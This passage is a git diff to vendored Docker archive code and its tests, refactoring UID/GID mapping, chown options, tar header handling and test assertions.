 		// and that linked name should be first in the tar archive
 		if oldpath, ok := ta.SeenFiles[inode]; ok {
@@ -321,30 +502,30 @@ func (ta *tarAppender) addTarFile(path, name string) error {
 		}
 	}
 
-	capability, _ := system.Lgetxattr(path, "security.capability")
-	if capability != nil {
-		hdr.Xattrs = make(map[string]string)
-		hdr.Xattrs["security.capability"] = string(capability)
-	}
+	//check whether the file is overlayfs whiteout
+	//if yes, skip re-mapping container ID mappings.
+	isOverlayWhiteout := fi.Mode()&os.ModeCharDevice != 0 && hdr.Devmajor == 0 && hdr.Devminor == 0
 
 	//handle re-mapping container ID mappings back to host ID mappings before
 	//writing tar headers/files. We skip whiteout files because they were written
 	//by the kernel and already have proper ownership relative to the host
-	if !strings.HasPrefix(filepath.Base(hdr.Name), WhiteoutPrefix) && (ta.UIDMaps != nil || ta.GIDMaps != nil) {
-		uid, gid, err := getFileUIDGID(fi.Sys())
-		if err != nil {
-			return err
-		}
-		xUID, err := idtools.ToContainer(uid, ta.UIDMaps)
+	if !isOverlayWhiteout &&
+		!strings.HasPrefix(filepath.Base(hdr.Name), WhiteoutPrefix) &&
+		!ta.IDMappings.Empty() {
+		fileIDPair, err := getFileUIDGID(fi.Sys())
 		if err != nil {
 			return err
 		}
-		xGID, err := idtools.ToContainer(gid, ta.GIDMaps)
+		hdr.Uid, hdr.Gid, err = ta.IDMappings.ToContainer(fileIDPair)
 		if err != nil {
 			return err
 		}
-		hdr.Uid = xUID
-		hdr.Gid = xGID
+	}
+
+	// explicitly override with ChownOpts
+	if ta.ChownOpts != nil {
+		hdr.Uid = ta.ChownOpts.UID
+		hdr.Gid = ta.ChownOpts.GID
 	}
 
 	if ta.WhiteoutConverter != nil {
@@ -398,7 +579,7 @@ func (ta *tarAppender) addTarFile(path, name string) error {
 	return nil
 }
 
-func createTarFile(path, extractDir string, hdr *tar.Header, reader io.Reader, Lchown bool, chownOpts *TarChownOptions, inUserns bool) error {
+func createTarFile(path, extractDir string, hdr *tar.Header, reader io.Reader, Lchown bool, chownOpts *idtools.IDPair, inUserns bool) error {
 	// hdr.Mode is in linux format, which we can use for sycalls,
 	// but for os.Foo() calls we need the mode converted to os.FileMode,
 	// so use hdrInfo.Mode() (they differ for e.g. setuid bits)
@@ -472,13 +653,13 @@ func createTarFile(path, extractDir string, hdr *tar.Header, reader io.Reader, L
 		return nil
 
 	default:
-		return fmt.Errorf("Unhandled tar header type %d\n", hdr.Typeflag)
+		return fmt.Errorf("unhandled tar header type %d", hdr.Typeflag)
 	}
 
 	// Lchown is not supported on Windows.
 	if Lchown && runtime.GOOS != "windows" {
 		if chownOpts == nil {
-			chownOpts = &TarChownOptions{UID: hdr.Uid, GID: hdr.Gid}
+			chownOpts = &idtools.IDPair{UID: hdr.Uid, GID: hdr.Gid}
 		}
 		if err := os.Lchown(path, chownOpts.UID, chownOpts.GID); err != nil {
 			return err
@@ -553,8 +734,7 @@ func TarWithOptions(srcPath string, options *TarOptions) (io.ReadCloser, error)
 	// on platforms other than Windows.
 	srcPath = fixVolumePathPrefix(srcPath)
 
-	patterns, patDirs, exceptions, err := fileutils.CleanPatterns(options.ExcludePatterns)
-
+	pm, err := fileutils.NewPatternMatcher(options.ExcludePatterns)
 	if err != nil {
 		return nil, err
 	}
@@ -567,14 +747,12 @@ func TarWithOptions(srcPath string, options *TarOptions) (io.ReadCloser, error)
 	}
 
 	go func() {
-		ta := &tarAppender{
-			TarWriter:         tar.NewWriter(compressWriter),
-			Buffer:            pools.BufioWriter32KPool.Get(nil),
-			SeenFiles:         make(map[uint64]string),
-			UIDMaps:           options.UIDMaps,
-			GIDMaps:           options.GIDMaps,
-			WhiteoutConverter: getWhiteoutConverter(options.WhiteoutFormat),
-		}
+		ta := newTarAppender(
+			idtools.NewIDMappingsFromMaps(options.UIDMaps, options.GIDMaps),
+			compressWriter,
+			options.ChownOpts,
+		)
+		ta.WhiteoutConverter = getWhiteoutConverter(options.WhiteoutFormat)
 
 		defer func() {
 			// Make sure to check the error on Close.
@@ -651,7 +829,7 @@ func TarWithOptions(srcPath string, options *TarOptions) (io.ReadCloser, error)
 				// is asking for that file no matter what - which is true
 				// for some files, like .dockerignore and Dockerfile (sometimes)
 				if include != relFilePath {
-					skip, err = fileutils.OptimizedMatches(relFilePath, patterns, patDirs)
+					skip, err = pm.Matches(relFilePath)
 					if err != nil {
 						logrus.Errorf("Error matching %s: %v", relFilePath, err)
 						return err
@@ -661,7 +839,7 @@ func TarWithOptions(srcPath string, options *TarOptions) (io.ReadCloser, error)
 				if skip {
 					// If we want to skip this file and its a directory
 					// then we should first check to see if there's an
-					// excludes pattern (eg !dir/file) that starts with this
+					// excludes pattern (e.g. !dir/file) that starts with this
 					// dir. If so then we can't skip this dir.
 
 					// Its not a dir then so we can just return/skip.
@@ -670,18 +848,17 @@ func TarWithOptions(srcPath string, options *TarOptions) (io.ReadCloser, error)
 					}
 
 					// No exceptions (!...) in patterns so just skip dir
-					if !exceptions {
+					if !pm.Exclusions() {
 						return filepath.SkipDir
 					}
 
 					dirSlash := relFilePath + string(filepath.Separator)
 
-					for _, pat := range patterns {
-						if pat[0] != '!' {
+					for _, pat := range pm.Patterns() {
+						if !pat.Exclusion() {
 							continue
 						}
-						pat = pat[1:] + string(filepath.Separator)
-						if strings.HasPrefix(pat, dirSlash) {
+						if strings.HasPrefix(pat.String()+string(filepath.Separator), dirSlash) {
 							// found a match - so can't skip this dir
 							return nil
 						}
@@ -731,10 +908,8 @@ func Unpack(decompressedArchive io.Reader, dest string, options *TarOptions) err
 	defer pools.BufioReader32KPool.Put(trBuf)
 
 	var dirs []*tar.Header
-	remappedRootUID, remappedRootGID, err := idtools.GetRootUIDGID(options.UIDMaps, options.GIDMaps)
-	if err != nil {
-		return err
-	}
+	idMappings := idtools.NewIDMappingsFromMaps(options.UIDMaps, options.GIDMaps)
+	rootIDs := idMappings.RootPair()
 	whiteoutConverter := getWhiteoutConverter(options.WhiteoutFormat)
 
 	// Iterate through the files in the archive.
@@ -768,7 +943,7 @@ loop:
 			parent := filepath.Dir(hdr.Name)
 			parentPath := filepath.Join(dest, parent)
 			if _, err := os.Lstat(parentPath); err != nil && os.IsNotExist(err) {
-				err = idtools.MkdirAllNewAs(parentPath, 0777, remappedRootUID, remappedRootGID)
+				err = idtools.MkdirAllAndChownNew(parentPath, 0777, rootIDs)
 				if err != nil {
 					return err
 				}
@@ -813,26 +988,8 @@ loop:
 		}
 		trBuf.Reset(tr)
 
-		// if the options contain a uid & gid maps, convert header uid/gid
-		// entries using the maps such that lchown sets the proper mapped
-		// uid/gid after writing the file. We only perform this mapping if
-		// the file isn't already owned by the remapped root UID or GID, as
-		// that specific uid/gid has no mapping from container -> host, and
-		// those files already have the proper ownership for inside the
-		// container.
-		if hdr.Uid != remappedRootUID {
-			xUID, err := idtools.ToHost(hdr.Uid, options.UIDMaps)
-			if err != nil {
-				return err
-			}
-			hdr.Uid = xUID
-		}
-		if hdr.Gid != remappedRootGID {
-			xGID, err := idtools.ToHost(hdr.Gid, options.GIDMaps)
-			if err != nil {
-				return err
-			}
-			hdr.Gid = xGID
+		if err := remapIDs(idMappings, hdr); err != nil {
+			return err
 		}
 
 		if whiteoutConverter != nil {
@@ -917,23 +1074,13 @@ func (archiver *Archiver) TarUntar(src, dst string) error {
 		return err
 	}
 	defer archive.Close()
-
-	var options *TarOptions
-	if archiver.UIDMaps != nil || archiver.GIDMaps != nil {
-		options = &TarOptions{
-			UIDMaps: archiver.UIDMaps,
-			GIDMaps: archiver.GIDMaps,
-		}
+	options := &TarOptions{
+		UIDMaps: archiver.IDMappingsVar.UIDs(),
+		GIDMaps: archiver.IDMappingsVar.GIDs(),
 	}
 	return archiver.Untar(archive, dst, options)
 }
 
-// TarUntar is a convenience function which calls Tar and Untar, with the output of one piped into the other.
-// If either Tar or Untar fails, TarUntar aborts and returns the error.
-func TarUntar(src, dst string) error {
-	return defaultArchiver.TarUntar(src, dst)
-}
-
 // UntarPath untar a file from path to a destination, src is the source tar file path.
 func (archiver *Archiver) UntarPath(src, dst string) error {
 	archive, err := os.Open(src)
@@ -941,22 +1088,13 @@ func (archiver *Archiver) UntarPath(src, dst string) error {
 		return err
 	}
 	defer archive.Close()
-	var options *TarOptions
-	if archiver.UIDMaps != nil || archiver.GIDMaps != nil {
-		options = &TarOptions{
-			UIDMaps: archiver.UIDMaps,
-			GIDMaps: archiver.GIDMaps,
-		}
+	options := &TarOptions{
+		UIDMaps: archiver.IDMappingsVar.UIDs(),
+		GIDMaps: archiver.IDMappingsVar.GIDs(),
 	}
 	return archiver.Untar(archive, dst, options)
 }
 
-// UntarPath is a convenience function which looks for an archive
-// at filesystem path `src`, and unpacks it at `dst`.
-func UntarPath(src, dst string) error {
-	return defaultArchiver.UntarPath(src, dst)
-}
-
 // CopyWithTar creates a tar archive of filesystem path `src`, and
 // unpacks it at filesystem path `dst`.
 // The archive is streamed directly with fixed buffering and no
@@ -970,30 +1108,19 @@ func (archiver *Archiver) CopyWithTar(src, dst string) error {
 		return archiver.CopyFileWithTar(src, dst)
 	}
 
-	// if this archiver is set up with ID mapping we need to create
+	// if this Archiver is set up with ID mapping we need to create
 	// the new destination directory with the remapped root UID/GID pair
 	// as owner
-	rootUID, rootGID, err := idtools.GetRootUIDGID(archiver.UIDMaps, archiver.GIDMaps)
-	if err != nil {
-		return err
-	}
+	rootIDs := archiver.IDMappingsVar.RootPair()
 	// Create dst, copy src's content into it
 	logrus.Debugf("Creating dest directory: %s", dst)
-	if err := idtools.MkdirAllNewAs(dst, 0755, rootUID, rootGID); err != nil {
+	if err := idtools.MkdirAllAndChownNew(dst, 0755, rootIDs); err != nil {
 		return err
 	}
 	logrus.Debugf("Calling TarUntar(%s, %s)", src, dst)
 	return archiver.TarUntar(src, dst)
 }
 
-// CopyWithTar creates a tar archive of filesystem path `src`, and
-// unpacks it at filesystem path `dst`.
-// The archive is streamed directly with fixed buffering and no
-// intermediary disk IO.
-func CopyWithTar(src, dst string) error {
-	return defaultArchiver.CopyWithTar(src, dst)
-}
-
 // CopyFileWithTar emulates the behavior of the 'cp' command-line
 // for a single file. It copies a regular file from path `src` to
 // path `dst`, and preserves all its metadata.
@@ -1014,59 +1141,51 @@ func (archiver *Archiver) CopyFileWithTar(src, dst string) (err error) {
 		dst = filepath.Join(dst, filepath.Base(src))
 	}
 	// Create the holding directory if necessary
-	if err := system.MkdirAll(filepath.Dir(dst), 0700); err != nil {
+	if err := system.MkdirAll(filepath.Dir(dst), 0700, ""); err != nil {
 		return err
 	}
 
 	r, w := io.Pipe()
-	errC := promise.Go(func() error {
-		defer w.Close()
+	errC := make(chan error, 1)
 
-		srcF, err := os.Open(src)
-		if err != nil {
-			return err
-		}
-		defer srcF.Close()
+	go func() {
+		defer close(errC)
 
-		hdr, err := tar.FileInfoHeader(srcSt, "")
-		if err != nil {
-			return err
-		}
-		hdr.Name = filepath.Base(dst)
-		hdr.Mode = int64(chmodTarEntry(os.FileMode(hdr.Mode)))
+		errC <- func() error {
+			defer w.Close()
 
-		remappedRootUID, remappedRootGID, err := idtools.GetRootUIDGID(archiver.UIDMaps, archiver.GIDMaps)
-		if err != nil {
-			return err
-		}
-
-		// only perform mapping if the file being copied isn't already owned by the
-		// uid or gid of the remapped root in the container
-		if remappedRootUID != hdr.Uid {
-			xUID, err := idtools.ToHost(hdr.Uid, archiver.UIDMaps)
+			srcF, err := os.Open(src)
 			if err != nil {
 				return err
 			}
-			hdr.Uid = xUID
-		}
-		if remappedRootGID != hdr.Gid {
-			xGID, err := idtools.ToHost(hdr.Gid, archiver.GIDMaps)
+			defer srcF.Close()
+
+			hdr, err := tar.FileInfoHeader(srcSt, "")
 			if err != nil {
 				return err
 			}
-			hdr.Gid = xGID
-		}
+			hdr.Format = tar.FormatPAX
+			hdr.ModTime = hdr.ModTime.Truncate(time.Second)
+			hdr.AccessTime = time.Time{}
+			hdr.ChangeTime = time.Time{}
+			hdr.Name = filepath.Base(dst)
+			hdr.Mode = int64(chmodTarEntry(os.FileMode(hdr.Mode)))
+
+			if err := remapIDs(archiver.IDMappingsVar, hdr); err != nil {
+				return err
+			}
 
-		tw := tar.NewWriter(w)
-		defer tw.Close()
-		if err := tw.WriteHeader(hdr); err != nil {
-			return err
-		}
-		if _, err := io.Copy(tw, srcF); err != nil {
-			return err
-		}
-		return nil
-	})
+			tw := tar.NewWriter(w)
+			defer tw.Close()
+			if err := tw.WriteHeader(hdr); err != nil {
+				return err
+			}
+			if _, err := io.Copy(tw, srcF); err != nil {
+				return err
+			}
+			return nil
+		}()
+	}()
 	defer func() {
 		if er := <-errC; err == nil && er != nil {
 			err = er
@@ -1080,23 +1199,21 @@ func (archiver *Archiver) CopyFileWithTar(src, dst string) (err error) {
 	return err
 }
 
-// CopyFileWithTar emulates the behavior of the 'cp' command-line
-// for a single file. It copies a regular file from path `src` to
-// path `dst`, and preserves all its metadata.
-//
-// Destination handling is in an operating specific manner depending
-// where the daemon is running. If `dst` ends with a trailing slash
-// the final destination path will be `dst/base(src)`  (Linux) or
-// `dst\base(src)` (Windows).
-func CopyFileWithTar(src, dst string) (err error) {
-	return defaultArchiver.CopyFileWithTar(src, dst)
+// IDMappings returns the IDMappings of the archiver.
+func (archiver *Archiver) IDMappings() *idtools.IDMappings {
+	return archiver.IDMappingsVar
+}
+
+func remapIDs(idMappings *idtools.IDMappings, hdr *tar.Header) error {
+	ids, err := idMappings.ToHost(idtools.IDPair{UID: hdr.Uid, GID: hdr.Gid})
+	hdr.Uid, hdr.Gid = ids.UID, ids.GID
+	return err
 }
 
 // cmdStream executes a command, and returns its stdout as a stream.
 // If the command fails to run or doesn't complete successfully, an error
 // will be returned, including anything written on stderr.
-func cmdStream(cmd *exec.Cmd, input io.Reader) (io.ReadCloser, <-chan struct{}, error) {
-	chdone := make(chan struct{})
+func cmdStream(cmd *exec.Cmd, input io.Reader) (io.ReadCloser, error) {
 	cmd.Stdin = input
 	pipeR, pipeW := io.Pipe()
 	cmd.Stdout = pipeW
@@ -1105,7 +1222,7 @@ func cmdStream(cmd *exec.Cmd, input io.Reader) (io.ReadCloser, <-chan struct{},
 
 	// Run the command and return the pipe
 	if err := cmd.Start(); err != nil {
-		return nil, nil, err
+		return nil, err
 	}
 
 	// Copy stdout to the returned pipe
@@ -1115,10 +1232,9 @@ func cmdStream(cmd *exec.Cmd, input io.Reader) (io.ReadCloser, <-chan struct{},
 		} else {
 			pipeW.Close()
 		}
-		close(chdone)
 	}()
 
-	return pipeR, chdone, nil
+	return pipeR, nil
 }
 
 // NewTempArchive reads the content of src into a temporary file, and returns the contents
diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_linux.go b/vendor/github.com/docker/docker/pkg/archive/archive_linux.go
index 6b2a31ff1f..970d4d0680 100644
--- a/vendor/github.com/docker/docker/pkg/archive/archive_linux.go
+++ b/vendor/github.com/docker/docker/pkg/archive/archive_linux.go
@@ -1,13 +1,13 @@
-package archive
+package archive // import "github.com/docker/docker/pkg/archive"
 
 import (
 	"archive/tar"
 	"os"
 	"path/filepath"
 	"strings"
-	"syscall"
 
 	"github.com/docker/docker/pkg/system"
+	"golang.org/x/sys/unix"
 )
 
 func getWhiteoutConverter(format WhiteoutFormat) tarWhiteoutConverter {
@@ -67,12 +67,9 @@ func (overlayWhiteoutConverter) ConvertRead(hdr *tar.Header, path string) (bool,
 
 	// if a directory is marked as opaque by the AUFS special file, we need to translate that to overlay
 	if base == WhiteoutOpaqueDir {
-		if err := syscall.Setxattr(dir, "trusted.overlay.opaque", []byte{'y'}, 0); err != nil {
-			return false, err
-		}
-
+		err := unix.Setxattr(dir, "trusted.overlay.opaque", []byte{'y'}, 0)
 		// don't write the file itself
-		return false, nil
+		return false, err
 	}
 
 	// if a file was deleted and we are using overlay, we need to create a character device
@@ -80,7 +77,7 @@ func (overlayWhiteoutConverter) ConvertRead(hdr *tar.Header, path string) (bool,
 		originalBase := base[len(WhiteoutPrefix):]
 		originalPath := filepath.Join(dir, originalBase)
 
-		if err := syscall.Mknod(originalPath, syscall.S_IFCHR, 0); err != nil {
+		if err := unix.Mknod(originalPath, unix.S_IFCHR, 0); err != nil {
 			return false, err
 		}
 		if err := os.Chown(originalPath, hdr.Uid, hdr.Gid); err != nil {
diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_linux_test.go b/vendor/github.com/docker/docker/pkg/archive/archive_linux_test.go
index d5f046e9df..9422269dff 100644
--- a/vendor/github.com/docker/docker/pkg/archive/archive_linux_test.go
+++ b/vendor/github.com/docker/docker/pkg/archive/archive_linux_test.go
@@ -1,4 +1,4 @@
-package archive
+package archive // import "github.com/docker/docker/pkg/archive"
 
 import (
 	"io/ioutil"
@@ -8,6 +8,9 @@ import (
 	"testing"
 
 	"github.com/docker/docker/pkg/system"
+	"golang.org/x/sys/unix"
+	"gotest.tools/assert"
+	"gotest.tools/skip"
 )
 
 // setupOverlayTestDir creates files in a directory with overlay whiteouts
@@ -20,47 +23,39 @@ import (
 // └── d3     # 0700
 //     └── f1 # whiteout, 0644
 func setupOverlayTestDir(t *testing.T, src string) {
+	skip.If(t, os.Getuid() != 0, "skipping test that requires root")
 	// Create opaque directory containing single file and permission 0700
-	if err := os.Mkdir(filepath.Join(src, "d1"), 0700); err != nil {
-		t.Fatal(err)
-	}
+	err := os.Mkdir(filepath.Join(src, "d1"), 0700)
+	assert.NilError(t, err)
 
-	if err := system.Lsetxattr(filepath.Join(src, "d1"), "trusted.overlay.opaque", []byte("y"), 0); err != nil {
-		t.Fatal(err)
-	}
+	err = system.Lsetxattr(filepath.Join(src, "d1"), "trusted.overlay.opaque", []byte("y"), 0)
+	assert.NilError(t, err)
 
-	if err := ioutil.WriteFile(filepath.Join(src, "d1", "f1"), []byte{}, 0600); err != nil {
-		t.Fatal(err)
-	}
+	err = ioutil.WriteFile(filepath.Join(src, "d1", "f1"), []byte{}, 0600)
+	assert.NilError(t, err)
 
 	// Create another opaque directory containing single file but with permission 0750
-	if err := os.Mkdir(filepath.Join(src, "d2"), 0750); err != nil {
-		t.Fatal(err)
-	}
+	err = os.Mkdir(filepath.Join(src, "d2"), 0750)
+	assert.NilError(t, err)
 
-	if err := system.Lsetxattr(filepath.Join(src, "d2"), "trusted.overlay.opaque", []byte("y"), 0); err != nil {
-		t.Fatal(err)
-	}
+	err = system.Lsetxattr(filepath.Join(src, "d2"), "trusted.overlay.opaque", []byte("y"), 0)
+	assert.NilError(t, err)
 
-	if err := ioutil.WriteFile(filepath.Join(src, "d2", "f1"), []byte{}, 0660); err != nil {
-		t.Fatal(err)
-	}
+	err = ioutil.WriteFile(filepath.Join(src, "d2", "f1"), []byte{}, 0660)
+	assert.NilError(t, err)
 
 	// Create regular directory with deleted file
-	if err := os.Mkdir(filepath.Join(src, "d3"), 0700); err != nil {
-		t.Fatal(err)
-	}
+	err = os.Mkdir(filepath.Join(src, "d3"), 0700)
+	assert.NilError(t, err)
 
-	if err := system.Mknod(filepath.Join(src, "d3", "f1"), syscall.S_IFCHR, 0); err != nil {
-		t.Fatal(err)
-	}
+	err = system.Mknod(filepath.Join(src, "d3", "f1"), unix.S_IFCHR, 0)
+	assert.NilError(t, err)
 }
 
 func checkOpaqueness(t *testing.T, path string, opaque string) {
 	xattrOpaque, err := system.Lgetxattr(path, "trusted.overlay.opaque")
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
+
 	if string(xattrOpaque) != opaque {
 		t.Fatalf("Unexpected opaque value: %q, expected %q", string(xattrOpaque), opaque)
 	}
@@ -69,9 +64,8 @@ func checkOpaqueness(t *testing.T, path string, opaque string) {
 
 func checkOverlayWhiteout(t *testing.T, path string) {
 	stat, err := os.Stat(path)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
+
 	statT, ok := stat.Sys().(*syscall.Stat_t)
 	if !ok {
 		t.Fatalf("Unexpected type: %t, expected *syscall.Stat_t", stat.Sys())
@@ -83,9 +77,8 @@ func checkOverlayWhiteout(t *testing.T, path string) {
 
 func checkFileMode(t *testing.T, path string, perm os.FileMode) {
 	stat, err := os.Stat(path)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
+
 	if stat.Mode() != perm {
 		t.Fatalf("Unexpected file mode for %s: %o, expected %o", path, stat.Mode(), perm)
 	}
@@ -93,23 +86,17 @@ func checkFileMode(t *testing.T, path string, perm os.FileMode) {
 
 func TestOverlayTarUntar(t *testing.T) {
 	oldmask, err := system.Umask(0)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 	defer system.Umask(oldmask)
 
 	src, err := ioutil.TempDir("", "docker-test-overlay-tar-src")
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 	defer os.RemoveAll(src)
 
 	setupOverlayTestDir(t, src)
 
 	dst, err := ioutil.TempDir("", "docker-test-overlay-tar-dst")
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 	defer os.RemoveAll(dst)
 
 	options := &TarOptions{
@@ -117,14 +104,11 @@ func TestOverlayTarUntar(t *testing.T) {
 		WhiteoutFormat: OverlayWhiteoutFormat,
 	}
 	archive, err := TarWithOptions(src, options)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 	defer archive.Close()
 
-	if err := Untar(archive, dst, options); err != nil {
-		t.Fatal(err)
-	}
+	err = Untar(archive, dst, options)
+	assert.NilError(t, err)
 
 	checkFileMode(t, filepath.Join(dst, "d1"), 0700|os.ModeDir)
 	checkFileMode(t, filepath.Join(dst, "d2"), 0750|os.ModeDir)
@@ -141,40 +125,31 @@ func TestOverlayTarUntar(t *testing.T) {
 
 func TestOverlayTarAUFSUntar(t *testing.T) {
 	oldmask, err := system.Umask(0)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 	defer system.Umask(oldmask)
 
 	src, err := ioutil.TempDir("", "docker-test-overlay-tar-src")
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 	defer os.RemoveAll(src)
 
 	setupOverlayTestDir(t, src)
 
 	dst, err := ioutil.TempDir("", "docker-test-overlay-tar-dst")
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 	defer os.RemoveAll(dst)
 
 	archive, err := TarWithOptions(src, &TarOptions{
 		Compression:    Uncompressed,
 		WhiteoutFormat: OverlayWhiteoutFormat,
 	})
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 	defer archive.Close()
 
-	if err := Untar(archive, dst, &TarOptions{
+	err = Untar(archive, dst, &TarOptions{
 		Compression:    Uncompressed,
 		WhiteoutFormat: AUFSWhiteoutFormat,
-	}); err != nil {
-		t.Fatal(err)
-	}
+	})
+	assert.NilError(t, err)
 
 	checkFileMode(t, filepath.Join(dst, "d1"), 0700|os.ModeDir)
 	checkFileMode(t, filepath.Join(dst, "d1", WhiteoutOpaqueDir), 0700)
diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_other.go b/vendor/github.com/docker/docker/pkg/archive/archive_other.go
index 54acbf2856..462dfc6323 100644
--- a/vendor/github.com/docker/docker/pkg/archive/archive_other.go
+++ b/vendor/github.com/docker/docker/pkg/archive/archive_other.go
@@ -1,6 +1,6 @@
 // +build !linux
 
-package archive
+package archive // import "github.com/docker/docker/pkg/archive"
 
 func getWhiteoutConverter(format WhiteoutFormat) tarWhiteoutConverter {
 	return nil
diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_test.go b/vendor/github.com/docker/docker/pkg/archive/archive_test.go
index b883be33ed..9f06af9969 100644
--- a/vendor/github.com/docker/docker/pkg/archive/archive_test.go
+++ b/vendor/github.com/docker/docker/pkg/archive/archive_test.go
@@ -1,18 +1,26 @@
-package archive
+package archive // import "github.com/docker/docker/pkg/archive"
 
 import (
 	"archive/tar"
 	"bytes"
+	"compress/gzip"
 	"fmt"
 	"io"
 	"io/ioutil"
 	"os"
 	"os/exec"
 	"path/filepath"
+	"reflect"
 	"runtime"
 	"strings"
 	"testing"
 	"time"
+
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/ioutils"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/skip"
 )
 
 var tmp string
@@ -24,35 +32,22 @@ func init() {
 	}
 }
 
-func TestIsArchiveNilHeader(t *testing.T) {
-	out := IsArchive(nil)
-	if out {
-		t.Fatalf("isArchive should return false as nil is not a valid archive header")
-	}
+var defaultArchiver = NewDefaultArchiver()
+
+func defaultTarUntar(src, dst string) error {
+	return defaultArchiver.TarUntar(src, dst)
 }
 
-func TestIsArchiveInvalidHeader(t *testing.T) {
-	header := []byte{0x00, 0x01, 0x02}
-	out := IsArchive(header)
-	if out {
-		t.Fatalf("isArchive should return false as %s is not a valid archive header", header)
-	}
+func defaultUntarPath(src, dst string) error {
+	return defaultArchiver.UntarPath(src, dst)
 }
 
-func TestIsArchiveBzip2(t *testing.T) {
-	header := []byte{0x42, 0x5A, 0x68}
-	out := IsArchive(header)
-	if !out {
-		t.Fatalf("isArchive should return true as %s is a bz2 header", header)
-	}
+func defaultCopyFileWithTar(src, dst string) (err error) {
+	return defaultArchiver.CopyFileWithTar(src, dst)
 }
 
-func TestIsArchive7zip(t *testing.T) {
-	header := []byte{0x50, 0x4b, 0x03, 0x04}
-	out := IsArchive(header)
-	if out {
-		t.Fatalf("isArchive should return false as %s is a 7z header and it is not supported", header)
-	}
+func defaultCopyWithTar(src, dst string) error {
+	return defaultArchiver.CopyWithTar(src, dst)
 }
 
 func TestIsArchivePathDir(t *testing.T) {
@@ -81,12 +76,7 @@ func TestIsArchivePathInvalidFile(t *testing.T) {
 }
 
 func TestIsArchivePathTar(t *testing.T) {
-	var whichTar string
-	if runtime.GOOS == "solaris" {
-		whichTar = "gtar"
-	} else {
-		whichTar = "tar"
-	}
+	whichTar := "tar"
 	cmdStr := fmt.Sprintf("touch /tmp/archivedata && %s -cf /tmp/archive /tmp/archivedata && gzip --stdout /tmp/archive > /tmp/archive.gz", whichTar)
 	cmd := exec.Command("sh", "-c", cmdStr)
 	output, err := cmd.CombinedOutput()
@@ -101,7 +91,7 @@ func TestIsArchivePathTar(t *testing.T) {
 	}
 }
 
-func testDecompressStream(t *testing.T, ext, compressCommand string) {
+func testDecompressStream(t *testing.T, ext, compressCommand string) io.Reader {
 	cmd := exec.Command("sh", "-c",
 		fmt.Sprintf("touch /tmp/archive && %s /tmp/archive", compressCommand))
 	output, err := cmd.CombinedOutput()
@@ -125,6 +115,8 @@ func testDecompressStream(t *testing.T, ext, compressCommand string) {
 	if err = r.Close(); err != nil {
 		t.Fatalf("Failed to close the decompressed stream: %v ", err)
 	}
+
+	return r
 }
 
 func TestDecompressStreamGzip(t *testing.T) {
@@ -142,7 +134,7 @@ func TestDecompressStreamXz(t *testing.T) {
 	testDecompressStream(t, "xz", "xz -f")
 }
 
-func TestCompressStreamXzUnsuported(t *testing.T) {
+func TestCompressStreamXzUnsupported(t *testing.T) {
 	dest, err := os.Create(tmp + "dest")
 	if err != nil {
 		t.Fatalf("Fail to create the destination file")
@@ -162,9 +154,9 @@ func TestCompressStreamBzip2Unsupported(t *testing.T) {
 	}
 	defer dest.Close()
 
-	_, err = CompressStream(dest, Xz)
+	_, err = CompressStream(dest, Bzip2)
 	if err == nil {
-		t.Fatalf("Should fail as xz is unsupported for compression format.")
+		t.Fatalf("Should fail as bzip2 is unsupported for compression format.")
 	}
 }
 
@@ -207,20 +199,20 @@ func TestExtensionGzip(t *testing.T) {
 	compression := Gzip
 	output := compression.Extension()
 	if output != "tar.gz" {
-		t.Fatalf("The extension of a bzip2 archive should be 'tar.gz'")
+		t.Fatalf("The extension of a gzip archive should be 'tar.gz'")
 	}
 }
 func TestExtensionXz(t *testing.T) {
 	compression := Xz
 	output := compression.Extension()
 	if output != "tar.xz" {
-		t.Fatalf("The extension of a bzip2 archive should be 'tar.xz'")
+		t.Fatalf("The extension of a xz archive should be 'tar.xz'")
 	}
 }
 
 func TestCmdStreamLargeStderr(t *testing.T) {
 	cmd := exec.Command("sh", "-c", "dd if=/dev/zero bs=1k count=1000 of=/dev/stderr; echo hello")
-	out, _, err := cmdStream(cmd, nil)
+	out, err := cmdStream(cmd, nil)
 	if err != nil {
 		t.Fatalf("Failed to start command: %s", err)
 	}
@@ -245,7 +237,7 @@ func TestCmdStreamBad(t *testing.T) {
 		t.Skip("Failing on Windows CI machines")
 	}
 	badCmd := exec.Command("sh", "-c", "echo hello; echo >&2 error couldn\\'t reverse the phase pulser; exit 1")
-	out, _, err := cmdStream(badCmd, nil)
+	out, err := cmdStream(badCmd, nil)
 	if err != nil {
 		t.Fatalf("Failed to start command: %s", err)
 	}
@@ -260,7 +252,7 @@ func TestCmdStreamBad(t *testing.T) {
 
 func TestCmdStreamGood(t *testing.T) {
 	cmd := exec.Command("sh", "-c", "echo hello; exit 0")
-	out, _, err := cmdStream(cmd, nil)
+	out, err := cmdStream(cmd, nil)
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -273,9 +265,7 @@ func TestCmdStreamGood(t *testing.T) {
 
 func TestUntarPathWithInvalidDest(t *testing.T) {
 	tempFolder, err := ioutil.TempDir("", "docker-archive-test")
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 	defer os.RemoveAll(tempFolder)
 	invalidDestFolder := filepath.Join(tempFolder, "invalidDest")
 	// Create a src file
@@ -294,11 +284,9 @@ func TestUntarPathWithInvalidDest(t *testing.T) {
 
 	cmd := exec.Command("sh", "-c", "tar cf "+tarFileU+" "+srcFileU)
 	_, err = cmd.CombinedOutput()
-	if err != nil {
